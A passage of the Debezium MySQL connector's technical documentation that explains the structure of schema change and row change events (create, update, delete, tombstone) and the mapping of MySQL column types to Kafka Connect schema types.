{\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"thread\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"table\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"query\"\n }\n ]\n }\n ]\n },\n \"payload\": {\n \"databaseName\": \"inventory\",\n \"ddl\": \"CREATE TABLE products ( id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY, name VARCHAR(255) NOT NULL, description VARCHAR(512), weight FLOAT ); ALTER TABLE products AUTO_INCREMENT = 101;\",\n \"source\" : {\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"server_id\": 0,\n \"ts_sec\": 0,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 154,\n \"row\": 0,\n \"snapshot\": true,\n \"thread\": null,\n \"db\": null,\n \"table\": null,\n \"query\": null\n }\n }\n }\n----\n\nThe `ddl` field may contain multiple DDL statements, but every statement in the event will apply to the database named in the `databaseName` field, and the statements will 
appear in the same order as applied to the database. Additionally, all of the events in the schema change topic will appear in the same order as applied to the MySQL server.\n\n[TIP]\n====\nThe `source` field is the exact same structure that appears in normal data change events written to table-specific topics. You can use the contents of this field to correlate the events on different topics.\n====\n\nAs mentioned above, each schema change event will contain one or more DDL statements that apply to a single database. What happens if a client submits a series of DDL statements that apply to _multiple_ databases (e.g., perhaps they use fully-qualified names)? If MySQL applies those statements atomically (e.g., as a single transaction), then the connector will take those DDL statements _in order_, group them by the affected database, and then create a schema change event for each of those groups. On the other hand, if MySQL applies those statements individually, then the connector will create a separate schema change event for each statement.\n\n[[events]]\n=== Events\n\nAll data change events produced by the MySQL connector have a key and a value, although the structure of the key and value depend on the table from which the change events originated (see link:#topic-names[Topic Names]).\n\n[NOTE]\n====\nStarting with Kafka 0.10, Kafka can optionally record with the message key and value the http:\/\/kafka.apache.org\/documentation.html#upgrade_10_performance_impact[_timestamp_] at which the message was created (recorded by the producer) or written to the log by Kafka.\n====\n\n[WARNING]\n====\nAs of Debezium 0.3, the Debezium MySQL connector ensures that all Kafka Connect _schema names_ are http:\/\/avro.apache.org\/docs\/current\/spec.html#names[valid Avro schema names]. This means that the logical server name must start with Latin letters or an underscore (e.g., [a-z,A-Z,\\_]), and the remaining characters in the logical server name and all characters in the database and table names must be Latin letters, digits, or an underscore (e.g., [a-z,A-Z,0-9,\\_]). If not, then all invalid characters will automatically be replaced with an underscore character.\n\nThis can lead to unexpected conflicts in schema names when the logical server name, database names, and table names contain other characters, and the only distinguishing characters between full table names are invalid and thus replaced with underscores.\n====\n\nDebezium and Kafka Connect are designed around _continuous streams of event messages_, and the structure of these events may change over time. This could be difficult for consumers to deal with, so to make it very easy Kafka Connect makes each event self-contained. Every message key and value has two parts: a _schema_ and _payload_. The schema describes the structure of the payload, while the payload contains the actual data.\n\n[[change-events-key]]\n==== Change event's key\n\nFor a given table, the change event's key will have a structure that contains a field for each column in the primary key (or unique key constraint) of the table at the time the event was created. 
Consider an `inventory` database with a `customers` table defined as:\n\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE KEY\n) AUTO_INCREMENT=1001;\n----\n\nEvery change event for the `customers` table while it has this definition will feature the same key structure, which in JSON looks like this:\n\n[source,json,indent=0]\n----\n {\n \"schema\": {\n \"type\": \"struct\",\n \"name\": \"mysql-server-1.inventory.customers.Key\",\n \"optional\": false,\n \"fields\": [\n {\n \"field\": \"id\",\n \"type\": \"int32\",\n \"optional\": false\n }\n ]\n },\n \"payload\": {\n \"id\": 1001\n }\n }\n----\n\nThe `schema` portion of the key contains a Kafka Connect schema describing what is in the payload portion, and in our case that means that the `payload` value is not optional, is a structure defined by a schema named `mysql-server-1.inventory.customers.Key`, and has one required field named `id` of type `int32`. If we look at the value of the key's `payload` field, we'll see that it is indeed a structure (which in JSON is just an object) with a single `id` field, whose value is `1001`.\n\nTherefore, we interpret this key as describing the row in the `inventory.customers` table (output from the connector named `mysql-server-1`) whose `id` primary key column had a value of `1001`.\n\n[NOTE]\n====\nAlthough the `column.blacklist` configuration property allows you to remove columns from the event values, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary or unique key, then the change event's key will be null. This makes sense since the rows in a table without a primary or unique key constraint cannot be uniquely identified.\n====\n\n[[change-events-value]]\n==== Change event's value\n\nThe value of the change event message is a bit more complicated. Like the key message, it has a _schema_ section and _payload_ section. Starting with Debezium 0.2, the payload section of every change event value produced by the MySQL connector has an _envelope_ structure with the following fields:\n\n* `op` is a mandatory field that contains a string value describing the type of operation. Values for the MySQL connector are `c` for create (or insert), `u` for update, `d` for delete, and `r` for read (in the case of a non-initial snapshot).\n* `before` is an optional field that if present contains the state of the row _before_ the event occurred. The structure will be described by the `mysql-server-1.inventory.customers.Value` Kafka Connect schema, which the `mysql-server-1` connector uses for all rows in the `inventory.customers` table.\n* `after` is an optional field that if present contains the state of the row _after_ the event occurred. 
The structure is described by the same `mysql-server-1.inventory.customers.Value` Kafka Connect schema used in `before`.\n* `source` is a mandatory field that contains a structure describing the source metadata for the event, which in the case of MySQL contains several fields: the Debezium version, the connector name, the name of the binlog file where the event was recorded, the position in that binlog file where the event appeared, the row within the event (if there is more than one), whether this event was part of a snapshot, name of the affected database and table, id of the MySQL thread creating the event (non-snapshot events only), and if available the MySQL server ID, and the timestamp in seconds. For non-snapshot events, if the MySQL server has the link:#enabling-query-log-events-optional[binlog_rows_query_log_events] option enabled, and the connector is configured with the `include.query` option enabled, the query field will contain the original SQL statement that generated the event.\n* `ts_ms` is optional and if present contains the time (using the system clock in the JVM running the Kafka Connect task) at which the connector processed the event.\n\nAnd of course, the _schema_ portion of the event message's value contains a schema that describes this envelope structure and the nested fields within it.\n\n[[create-events]]\nLet's look at what a _create_ event value might look like for our `customers` table:\n\n[source,json,indent=0,subs=\"attributes\"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"optional\": false,\n \"name\": \"mysql-server-1.inventory.customers.Envelope\",\n \"version\": 1,\n \"fields\": [\n {\n \"field\": \"op\",\n \"type\": \"string\",\n \"optional\": false\n },\n {\n \"field\": \"before\",\n \"type\": \"struct\",\n \"optional\": true,\n \"name\": \"mysql-server-1.inventory.customers.Value\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ]\n },\n {\n \"field\": \"after\",\n \"type\": \"struct\",\n \"name\": \"mysql-server-1.inventory.customers.Value\",\n \"optional\": true,\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ]\n },\n {\n \"field\": \"source\",\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.Source\",\n \"optional\": false,\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"server_id\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_sec\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"gtid\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"file\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"pos\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"row\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n 
},\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"thread\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"table\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"query\"\n }\n ]\n },\n {\n \"field\": \"ts_ms\",\n \"type\": \"int64\",\n \"optional\": true\n }\n ]\n },\n \"payload\": {\n \"op\": \"c\",\n \"ts_ms\": 1465491411815,\n \"before\": null,\n \"after\": {\n \"id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": {\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"server_id\": 0,\n \"ts_sec\": 0,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 154,\n \"row\": 0,\n \"snapshot\": false,\n \"thread\": 7,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"query\": \"INSERT INTO customers (first_name, last_name, email) VALUES ('Anne', 'Kretchmar', 'annek@noanswer.org')\"\n }\n }\n}\n----\n\nIf we look at the `schema` portion of this event's _value_, we can see the schema for the _envelope_, the schema for the `source` structure (which is specific to the MySQL connector and reused across all events), and the table-specific schemas for the `before` and `after` fields.\n\n[TIP]\n====\nThe names of the schemas for the `before` and `after` fields are of the form \"_logicalName_._tableName_.Value\", and thus are entirely independent from all other schemas for all other tables. This means that when using the link:\/docs\/faq\/#avro-converter[Avro Converter], the resulting Avro schemas for _each table_ in each _logical source_ have their own evolution and history.\n====\n\nIf we look at the `payload` portion of this event's _value_, we can see the information in the event, namely that it is describing that the row was created (since `op=c`), and that the `after` field value contains the values of the newly inserted row's `id`, `first_name`, `last_name`, and `email` columns.\n\n[TIP]\n====\nIt may appear that the JSON representations of the events are much larger than the rows they describe. This is true, because the JSON representation must include the _schema_ and the _payload_ portions of the message. It is possible and even recommended to use the link:\/docs\/faq\/#avro-converter[Avro Converter] to dramatically decrease the size of the actual messages written to the Kafka topics.\n====\n\n[[update-events]]\nThe value of an _update_ change event on this table will actually have the exact same _schema_, and its payload will be structured the same but will hold different values. Here's an example of that event's _value_, formatted to be easier to read:\n\n[source,json,indent=0,subs=\"attributes\"]\n----\n{\n \"schema\": { ... 
},\n \"payload\": {\n \"before\": {\n \"id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": {\n \"id\": 1004,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": {\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"server_id\": 223344,\n \"ts_sec\": 1465581,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 484,\n \"row\": 0,\n \"snapshot\": false,\n \"thread\": 7,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"query\": \"UPDATE customers SET first_name='Anne Marie' WHERE id=1004\"\n },\n \"op\": \"u\",\n \"ts_ms\": 1465581029523\n }\n}\n----\n\nWhen we compare this to the value in the _insert_ event, we see a couple of differences in the `payload` section:\n\n* The `op` field value is now `u`, signifying that this row changed because of an update.\n* The `before` field now has the state of the row with the values before the database commit.\n* The `after` field now has the updated state of the row, and here we can see that the `first_name` value is now `Anne Marie`.\n* The `source` field structure has the same fields as before, but the values are different since this event is from a different position in the binlog.\n* The `ts_ms` shows the timestamp at which Debezium processed this event.\n\nThere are several things we can learn by just looking at this `payload` section. We can compare the `before` and `after` structures to determine what actually changed in this row because of the commit. The `source` structure tells us about MySQL's record of this change (providing traceability), but more importantly it has information we can compare to other events in this and other topics to know whether this event occurred before, after, or as part of the same MySQL commit as other events.\n\n[NOTE]\n====\nWhen the columns for a row's primary\/unique key are updated, the value of the row's key has changed, so Debezium will output _three_ events: a `DELETE` event and a link:#tombstone-events[tombstone event] with the old key for the row, followed by an `INSERT` event with the new key for the row.\n====\n
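\nFor illustration, here is a condensed sketch of that three-event sequence, showing only each message's key and the `op` field of its value; the new key value `2004` is hypothetical, all other fields are elided, and the schema portions are omitted:\n\n[source,json,indent=0]\n----\n{ \"key\": { \"id\": 1004 }, \"value\": { \"op\": \"d\", ... } } \/\/ DELETE event carrying the old key\n{ \"key\": { \"id\": 1004 }, \"value\": null } \/\/ tombstone event for the old key\n{ \"key\": { \"id\": 2004 }, \"value\": { \"op\": \"c\", ... } } \/\/ INSERT event carrying the new key\n----\n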
\n[[delete-events]]\nSo far we've seen samples of _create_ and _update_ events. Now, let's look at the value of a _delete_ event for the same table. Once again, the `schema` portion of the value will be exactly the same as with the _create_ and _update_ events:\n\n[source,json,indent=0,subs=\"attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": {\n \"id\": 1004,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": null,\n \"source\": {\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"server_id\": 223344,\n \"ts_sec\": 1465581,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 805,\n \"row\": 0,\n \"snapshot\": false,\n \"thread\": 7,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"query\": \"DELETE FROM customers WHERE id=1004\"\n },\n \"op\": \"d\",\n \"ts_ms\": 1465581902461\n }\n}\n----\n\nIf we look at the `payload` portion, we see a number of differences compared with the _create_ or _update_ event payloads:\n\n* The `op` field value is now `d`, signifying that this row was deleted.\n* The `before` field now has the state of the row that was deleted with the database commit.\n* The `after` field is null, signifying that the row no longer exists.\n* The `source` field structure has many of the same values as before, except the `ts_sec` and `pos` fields have changed (and the `file` might have changed in other circumstances).\n* The `ts_ms` shows the timestamp at which Debezium processed this event.\n\nThis event gives a consumer all kinds of information that it can use to process the removal of this row. We include the old values because some consumers might require them in order to properly handle the removal; without them, consumers may have to resort to far more complex behavior.\n\nThe MySQL connector's events are designed to work with https:\/\/cwiki.apache.org\/confluence\/display\/KAFKA\/Log+Compaction[Kafka log compaction], which allows for the removal of some older messages as long as at least the most recent message for every key is kept. This allows Kafka to reclaim storage space while ensuring the topic contains a complete dataset and can be used for reloading key-based state.\n\n[[tombstone-events]]\nWhen a row is deleted, the _delete_ event value listed above still works with log compaction, since Kafka can still remove all earlier messages with that same key. But only if the message value is null will Kafka know that it can remove _all messages_ with that same key. To make this possible, Debezium's MySQL connector always follows a _delete_ event with a special _tombstone_ event that has the same key but a null value.\n\n[NOTE]\n====\nAs of Kafka 0.10, the JSON converter provided by Kafka Connect never results in a null value for the message (https:\/\/issues.apache.org\/jira\/browse\/KAFKA-3832[KAFKA-3832]). Therefore, Kafka's log compaction will always retain the last message, even when the tombstone event is supplied, though it will be free to remove all prior messages with the same key. In other words, until this is fixed, using the JSON converter will reduce the effectiveness of Kafka's log compaction.\n\nIn the meantime, consider using the link:\/docs\/faq\/#avro-converter[Avro Converter], which does properly return a null value and will thus take full advantage of Kafka log compaction.\n====\n
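\nTo make this concrete, here is a minimal sketch (schemas elided, row values borrowed from the delete example above) of the two messages a consumer will see on the topic after the row is deleted:\n\n[source,json,indent=0]\n----\n\/\/ the delete event, with \"before\" carrying the old row state\n{ \"key\": { \"id\": 1004 }, \"value\": { \"op\": \"d\", \"before\": { \"id\": 1004, ... }, \"after\": null, ... } }\n\n\/\/ the tombstone event: same key, null value, so log compaction may drop all messages for this key\n{ \"key\": { \"id\": 1004 }, \"value\": null }\n----\n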
\n[[data-types]]\n=== Data types\n\nAs described above, the MySQL connector represents the changes to rows with events that are structured like the table in which the row exists. The event contains a field for each column value, and how that value is represented in the event depends on the MySQL data type of the column. This section describes this mapping.\n\nThe following table describes how the connector maps each of the MySQL data types to a _literal type_ and _semantic type_ within the events' fields. Here, the _literal type_ describes how the value is literally represented using Kafka Connect schema types, namely `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`. The _semantic type_ describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.\n\n[cols=\"20%a,15%a,30%a,35%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|MySQL Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`BOOLEAN`, `BOOL`\n|`BOOLEAN`\n|n\/a\n|\n\n|`BIT(1)`\n|`BOOLEAN`\n|n\/a\n|\n\n|`BIT( > 1)`\n|`BYTES`\n|`io.debezium.data.Bits`\n|The `length` schema parameter contains an integer representing the number of bits. The resulting `byte[]` will contain the bits in little-endian form and will be sized to contain at least the specified number of bits (e.g., `numBytes = n\/8 + (n%8 == 0 ? 0 : 1)` where `n` is the number of bits).\n\n|`TINYINT`\n|`INT8`\n|n\/a\n|\n\n|`SMALLINT[(M)]`\n|`INT16`\n|n\/a\n|\n\n|`MEDIUMINT[(M)]`\n|`INT32`\n|n\/a\n|\n\n|`INT`, `INTEGER[(M)]`\n|`INT32`\n|n\/a\n|\n\n|`BIGINT[(M)]`\n|`INT64`\n|n\/a\n|\n\n|`REAL[(M,D)]`\n|`FLOAT32`\n|n\/a\n|\n\n|`FLOAT[(M,D)]`\n|`FLOAT64`\n|n\/a\n|\n\n|`DOUBLE[(M,D)]`\n|`FLOAT64`\n|n\/a\n|\n\n|`CHAR(M)`\n|`STRING`\n|n\/a\n|\n\n|`VARCHAR(M)`\n|`STRING`\n|n\/a\n|\n\n|`BINARY(M)`\n|`BYTES`\n|n\/a\n|\n\n|`VARBINARY(M)`\n|`BYTES`\n|n\/a\n|\n\n|`TINYBLOB`\n|`BYTES`\n|n\/a\n|\n\n|`TINYTEXT`\n|`STRING`\n|n\/a\n|\n\n|`BLOB`\n|`BYTES`\n|n\/a\n|\n\n|`TEXT`\n|`STRING`\n|n\/a\n|\n\n|`MEDIUMBLOB`\n|`BYTES`\n|n\/a\n|\n\n|`MEDIUMTEXT`\n|`STRING`\n|n\/a\n|\n\n|`LONGBLOB`\n|`BYTES`\n|n\/a\n|\n\n|`LONGTEXT`\n|`STRING`\n|n\/a\n|\n\n|`JSON`\n|`STRING`\n|`io.debezium.data.Json`\n|Contains the string representation of a JSON document, array, or scalar.\n\n|`ENUM`\n|`STRING`\n|`io.debezium.data.Enum`\n|The `allowed` schema parameter contains the comma-separated list of allowed values.\n\n|`SET`\n|`STRING`\n|`io.debezium.data.EnumSet`\n|The `allowed` schema parameter contains the comma-separated list of allowed values.\n\n|`YEAR[(2\\|4)]`\n|`INT32`\n|`io.debezium.time.Year`\n|\n\n|`TIMESTAMP[(M)]`\n|`STRING`\n|`io.debezium.time.ZonedTimestamp`\n| Contains an ISO8601 formatted date and time (with up to microsecond precision) in a particular time zone. MySQL allows `M` to be in the range 0-6 to store up to microsecond precision.\n\n|=======================\n
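\nAs a quick illustration of a few of these mappings, consider a hypothetical table with the columns `flags BIT(8)`, `status ENUM('active','inactive')`, and `metadata JSON`. The `after` fragment of a change event for such a row would look roughly like the following when using the JSON converter, which renders `BYTES` values as Base64 (here `\"gQ==\"` encodes the single little-endian byte `0x81`, i.e. the bit pattern `10000001`); the column names and values are invented:\n\n[source,json,indent=0]\n----\n\"after\": {\n \"id\": 1,\n \"flags\": \"gQ==\",\n \"status\": \"active\",\n \"metadata\": \"{\\\"priority\\\": 2}\"\n}\n----\n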
\nColumns that store strings are defined in MySQL with a character set and collation, either explicitly on the column's definition or implicitly by inheriting the table's, database's, or server's default character sets and collations. As of 0.3.1, the MySQL connector uses the column's character set when reading the binary representation of the column values in the binlog events.\n\nOther data type mappings are described in the following sections.\n\nIf present, a column's default value will be propagated to the corresponding field's Kafka Connect schema.\nFor `TIMESTAMP` columns whose default value is specified as `CURRENT_TIMESTAMP` or `NOW`, the value _1970-01-01 00:00:00_ will be used as the default value in the Kafka Connect schema.\nChange messages will contain the field's default value (unless an explicit column value was given), so there should rarely be a need to obtain the default value from the schema.\nPassing the default value nevertheless helps satisfy the compatibility rules when link:\/docs\/configuration\/avro\/[using Avro] as the serialization format together with the Confluent schema registry.\n\n[[temporal-values]]\n==== Temporal values\n\nOther than MySQL's `TIMESTAMP` data type, the MySQL temporal types depend on the value of the `time.precision.mode` configuration property.\n\n[NOTE]\n====\nAs of Debezium 0.7, the `adaptive_time_microseconds` mode was introduced and is the default `time.precision.mode` for the MySQL connector. The `adaptive` mode was marked as deprecated.\n====\n\n[WARNING]\n====\nWhen `time.precision.mode` is set to `adaptive`, only positive `TIME` field values in the range of 00:00:00.000000 to 23:59:59.999999 can be captured correctly.\nWhen `time.precision.mode` is set to `connect`, only values in the range of `00:00:00.000` to `23:59:59.999` can be handled.\n\nThe `adaptive` and `connect` time precision modes should only be used if you can make sure that the `TIME` values in your tables will never exceed the supported ranges. These modes will be removed in a future version of Debezium.\n====\n\nWhen the `time.precision.mode` configuration property is set to `adaptive_time_microseconds` (the default), the connector will determine the literal type and semantic type for the MySQL types `TIME`, `DATE`, and `DATETIME` based on the column's data type definition, so that events _exactly_ represent the values in the database; all `TIME` fields are captured as microseconds:\n\n[cols=\"15%a,15%a,35%a,35%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|MySQL Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date`\n| Represents the number of days since epoch.\n\n|`TIME[(M)]`\n|`INT64`\n|`io.debezium.time.MicroTime`\n| Represents the time value in microseconds and does not include timezone information. 
MySQL allows `M` to be in the range 0-6 to store up to microsecond precision.\n\n|`DATETIME`, `DATETIME(0)`, `DATETIME(1)`, `DATETIME(2)`, `DATETIME(3)`\n|`INT64`\n|`io.debezium.time.Timestamp`\n| Represents the number of milliseconds past epoch, and does not include timezone information.\n\n|`DATETIME(4)`, `DATETIME(5)`, `DATETIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTimestamp`\n| Represents the number of microseconds past epoch, and does not include timezone information.\n\n|=======================\n\nWhen the `time.precision.mode` configuration property is set to `adaptive` (deprecated), the connector will determine the literal type and semantic type for the temporal types based on the column's data type definition, so that events _exactly_ represent the values in the database:\n\n[cols=\"15%a,15%a,35%a,35%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|MySQL Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date`\n| Represents the number of days since epoch.\n\n|`TIME`, `TIME(0)`, `TIME(1)`, `TIME(2)`, `TIME(3)`\n|`INT32`\n|`io.debezium.time.Time`\n| Represents the number of milliseconds past midnight, and does not include timezone information.\n\n|`TIME(4)`, `TIME(5)`, `TIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTime`\n| Represents the number of microseconds past midnight, and does not include timezone information.\n\n|`DATETIME`, `DATETIME(0)`, `DATETIME(1)`, `DATETIME(2)`, `DATETIME(3)`\n|`INT64`\n|`io.debezium.time.Timestamp`\n| Represents the number of milliseconds past epoch, and does not include timezone information.\n\n|`DATETIME(4)`, `DATETIME(5)`, `DATETIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTimestamp`\n| Represents the number of microseconds past epoch, and does not include timezone information.\n\n|=======================\n\nWhen the `time.precision.mode` configuration property is set to `connect`, the connector will use the predefined Kafka Connect logical types, as was the case with the 0.2.x MySQL connector. This may be useful when consumers only know about the built-in Kafka Connect logical types and are unable to handle variable-precision time values. On the other hand, since MySQL allows both `TIME` and `DATETIME` to have a _fractional second precision_ of 0-6 to store up to microsecond precision, the events generated by a connector with the `connect` time precision mode will _*result in a loss of precision*_ when the database column has a _fractional second precision_ value greater than 3:\n\n[cols=\"15%a,15%a,35%a,35%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|MySQL Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`DATE`\n|`INT32`\n|`org.apache.kafka.connect.data.Date`\n| Represents the number of days since epoch.\n\n|`TIME[(M)]`\n|`INT64`\n|`org.apache.kafka.connect.data.Time`\n| Represents the number of milliseconds since midnight, and does not include timezone information. MySQL allows `M` to be in the range 0-6 to store up to microsecond precision, though this mode results in a loss of precision when `M` > 3.\n\n|`DATETIME[(M)]`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp`\n| Represents the number of milliseconds since epoch, and does not include timezone information. MySQL allows `M` to be in the range 0-6 to store up to microsecond precision, though this mode results in a loss of precision when `M` > 3.\n\n|=======================\n
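\nAs a worked example (column name and value hypothetical), a `TIME(6)` value of `17:51:04.777123` is 64,264 seconds past midnight plus 777,123 microseconds. In `adaptive_time_microseconds` mode it is captured in full, while in `connect` mode the value is reduced to millisecond precision and the final digits are lost, roughly as the JSON converter would serialize it:\n\n[source,json,indent=0]\n----\n\"start_time\": 64264777123 \/\/ adaptive_time_microseconds: io.debezium.time.MicroTime, microseconds\n\"start_time\": 64264777 \/\/ connect: org.apache.kafka.connect.data.Time, milliseconds (microseconds dropped)\n----\n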
\n[[zero-values]]\nMySQL allows http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/date-and-time-types.html[zero-values] for `DATE`, `DATETIME`, and `TIMESTAMP` columns, which are sometimes preferred over null values. These values cannot be represented using any of the Java types with either of the `time.precision.mode` options, and therefore the MySQL connector will represent them as `null` values when the column definition allows nulls, or as the _epoch day_ when the column does not allow nulls.\n\n[[temporal-values-without-timezone]]\n===== Temporal values without time zone\n\nThe `DATETIME` type represents a local date and time such as \"2018-01-13 09:48:27\", i.e. there is no time zone information.\nSuch columns are converted into epoch milliseconds or microseconds (based on the column's precision) using UTC.\nFor example, the value \"2018-06-20 06:37:03\" of a column of type `DATETIME` (no precision given) will be represented by the value 1529476623000.\n\nThe `TIMESTAMP` type represents a timestamp without time zone information and is converted by MySQL from the server's (or session's) current time zone into UTC when writing and vice versa when reading back the value.\nSuch columns are converted into an equivalent `io.debezium.time.ZonedTimestamp` in UTC based on the server's (or session's) current time zone.\nThe time zone will be queried from the server by default.\nIf this fails, it must be specified explicitly using the `database.serverTimezone` connector option.\nIf, for instance, the database's time zone (either globally or as configured for the connector by means of the aforementioned option) is \"America\/Los_Angeles\", the `TIMESTAMP` value \"2018-06-20 06:37:03\" will be represented by a `ZonedTimestamp` with the value \"2018-06-20T13:37:03Z\".\n\nNote that the time zone of the JVM running Kafka Connect and Debezium does not affect these conversions.\n\n[WARNING]\n====\nThe handling of these column types relies on the non-legacy date\/time handling mode of the MySQL JDBC driver.\nIt is therefore strongly advised against switching to the legacy mode by passing the `database.useLegacyDatetimeCode` connector option with a value of `true`, as that may result in unexpected values of temporal columns in emitted change data messages.\n====\n\n[[decimal-values]]\n==== Decimal values\n\nWhen the `decimal.handling.mode` configuration property is set to `precise`, the connector will use the predefined Kafka Connect `org.apache.kafka.connect.data.Decimal` logical type for all `DECIMAL` and `NUMERIC` columns. This is the default mode.\n
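\nTo preview the difference between `precise` and the alternative `double` and `string` modes described below (column name and value invented), a `DECIMAL(10,2)` column holding `1000.00` would surface roughly as follows when serialized by the JSON converter; in `precise` mode the `java.math.BigDecimal` is rendered as the Base64-encoded unscaled value (here `100000`, i.e. the bytes `0x01 0x86 0xA0`), with the scale recorded as a schema parameter:\n\n[source,json,indent=0]\n----\n\"price\": \"AYag\" \/\/ decimal.handling.mode=precise (Base64 bytes, scale 2 in the schema)\n\"price\": 1000.0 \/\/ decimal.handling.mode=double\n\"price\": \"1000.00\" \/\/ decimal.handling.mode=string\n----\n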
\n[cols=\"15%a,15%a,35%a,35%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|MySQL Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`NUMERIC[(M[,D])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal`\n|The `scale` schema parameter contains an integer representing how many digits the decimal point was shifted.\n\n|`DECIMAL[(M[,D])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal`\n|The `scale` schema parameter contains an integer representing how many digits the decimal point was shifted.\n\n|=======================\n\nHowever, when the `decimal.handling.mode` configuration property is set to `double`, the connector will represent all `DECIMAL` and `NUMERIC` values as Java double values and encode them as follows:\n\n[cols=\"15%a,15%a,35%a,35%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|MySQL Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`NUMERIC[(M[,D])]`\n|`FLOAT64`\n|\n|\n\n|`DECIMAL[(M[,D])]`\n|`FLOAT64`\n|\n|\n\n|=======================\n\nThe last option for the `decimal.handling.mode` configuration property is `string`. In this case the connector will represent all `DECIMAL` and `NUMERIC` values as their formatted string representation and encode them as follows:\n\n[cols=\"15%a,15%a,35%a,35%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|MySQL Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`NUMERIC[(M[,D])]`\n|`STRING`\n|\n|\n\n|`DECIMAL[(M[,D])]`\n|`STRING`\n|\n|\n\n|=======================\n\n[[spatial-types]]\n==== Spatial data types\n\nAs of version 0.5.1, the MySQL connector also has limited support for some of the following 